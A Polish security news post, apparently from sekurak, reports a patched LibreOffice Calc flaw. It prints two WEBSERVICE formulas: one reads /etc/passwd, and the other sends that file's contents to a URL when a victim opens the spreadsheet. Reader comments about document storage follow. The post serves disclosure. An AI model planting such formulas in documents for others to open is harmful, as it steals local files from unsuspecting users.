Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
LibreOffice: można pobierać pliki z dysku ofiary. Wystarczy, że otworzy ona odpowiedni dokument.
Właśnie załatano podatność, wykorzystującą prostą funkcję =WEBSERVICE()
LibreOffice Calc supports a WEBSERVICE function to obtain data by URL. Vulnerable versions of LibreOffice allow WEBSERVICE to take a local file URL (e.g file://) which can be used to inject local files into the spreadsheet without warning the user.
W pakiecie MS Office istnieje taka sama funkcja, ale… nie pozwala ona na odczyt lokalnych plików. W przypadku Libre Office jest to banalne: =WEBSERVICE(„/etc/passwd”) Podobnie proste jest wysłanie zawartości pliku pod konkretny URL: =WEBSERVICE(„http://localhost:6000/?q=” & WEBSERVICE(„/etc/passwd”)) Wystarczy, że użytkownik otworzy odpowiedni plik Libre Office. Podatność załatano w wersjach: 5.4.5 / 6.0.1
–ms
Witam; A kto trzyma ważne dokumenty na Pc-cie? Przecież to jest tylko urządzenie do pracy; Mądry przechowuje materiały gdzie indziej. Sprzęt do przechowywania jest przecież tani; w czym problem? Czyżby problemem był brak wiedzy? Pozdrawiam.
Ps. To są podstawy,wiedzy z informatyki.
i twierdzisz, że nic wartego uwagi nie znajdę na twoim PC? ;)
> Witam; A kto trzyma ważne dokumenty na Pc-cie? Przecież
> to jest tylko urządzenie do pracy; Mądry przechowuje
> materiały gdzie indziej.
Właśnie na PC-ie się pracuje nad dokumentem, nie sądzisz? Nawet, jeśli się go potem przechowuje na dysku zewnętrznym czy gdzie tam jeszcze.
kto trzyma ważne dokumenty na Pc-cie? Większość… w domu. Sprzęt do przechowywania danych wbrew pozorom nie jest tani, no chyba, że się kupuje tylko dla sztuki, a i ten trzeba skonfigurować. Przypadki podatności w NAS-ach też się są, chmury nie każdy potrafi rozważnie używać (bye bye prywatność). Co innego firmy a co innego użytkownicy domowi.
Ja widać mądry nie jestem i nie znam podstaw.
Możesz napisać coś więcej, gdzie przechowywać dokumenty czy zdjęcia?
Radek